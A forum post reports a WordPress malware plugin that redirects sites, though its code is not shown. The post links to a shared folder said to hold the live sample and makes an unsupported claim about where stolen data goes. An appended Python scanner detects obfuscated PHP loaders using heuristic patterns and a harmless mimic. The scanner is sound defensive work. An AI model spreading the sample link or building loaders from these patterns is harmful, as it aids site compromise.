
New malware not detected by Wordfence


Today 3 of my websites got hammered by this malware:

wordpresss3cll-0.3

The file was uploaded to the upload directory somehow, and it adds a decoded code to index.php which redirects your website to a Chinese website, using the following code:




The uploaded plugin can be found at the following link.
I did a quick reading … it contains code to change passwords and to steal cookies … and direct them to a Chinese government DB.

https://drive.google.com/drive/folders/1ztSYjc4aXUNLfcdsxHaLzHbV6-0W30l4?usp=share_link

Regards
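One way to hunt for the loader shape the post describes, as an added example that is not part of the original post and not Wordfence's signatures: it flags PHP whose variables are named only with `O` and `0`, that calls `urldecode()` on a heavily percent-escaped literal, or that pairs `eval()` with a long base64-looking string, plus any PHP file under `wp-content/uploads/`. The thresholds, function names and the harmless sample tree are assumptions constructed for the example.

```python
import base64
import re
import tempfile
from pathlib import Path

O0_VAR = re.compile(r"\$[O0]{5,}(?![A-Za-z0-9_])")        # names built only from O and 0
EVAL = re.compile(r"\beval\s*\(")
LONG_B64 = re.compile(r"[\"'][A-Za-z0-9+/=]{200,}[\"']")   # long base64-looking literal
URLDECODE_LIT = re.compile(r"urldecode\(\s*[\"']([^\"']*)[\"']")


def indicators(php_source):
    """Return sorted names of the heuristics that match one PHP source text."""
    hits = set()
    if len(set(O0_VAR.findall(php_source))) >= 3:
        hits.add("o0_variable_names")
    if EVAL.search(php_source) and LONG_B64.search(php_source):
        hits.add("eval_with_long_base64_literal")
    if any(lit.count("%") >= 10 for lit in URLDECODE_LIT.findall(php_source)):
        hits.add("urldecode_of_escaped_alphabet")
    return sorted(hits)


def scan(root):
    """Walk a site tree; return {relative_path: [reasons]} for suspect PHP files."""
    report = {}
    for path in sorted(p for p in Path(root).rglob("*.php") if p.is_file()):
        rel = path.relative_to(root).as_posix()
        reasons = indicators(path.read_text(encoding="utf-8", errors="replace"))
        if rel.startswith("wp-content/uploads/"):  # uploads should hold media, not PHP
            reasons.append("php_in_uploads_directory")
        if reasons:
            report[rel] = reasons
    return report


def build_demo_tree():
    """Constructed, harmless sample: mimic loader, clean file, PHP file in uploads."""
    root = Path(tempfile.mkdtemp())
    blob = base64.b64encode(b"harmless constructed text " * 12).decode()
    loader = ('<?php $O00OO0=urldecode("' + "%61%62%63%64" * 3 + '");$O00O0O=$O00OO0[0];'
              '$O0OO00=$O00OO0[1];eval($O00O0O("' + blob + '")); ?>')
    files = {"index.php": loader, "wp-login.php": "<?php echo 'ok'; ?>",
             "wp-content/uploads/2023/x.php": "<?php echo 'hi'; ?>"}
    for rel, body in files.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(body, encoding="utf-8")
    return root
```

Calling `scan()` on a real WordPress document root returns a dictionary of relative paths and the reasons each was flagged; a hit is a lead for manual review and comparison against a clean copy of the same WordPress version, not a verdict.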

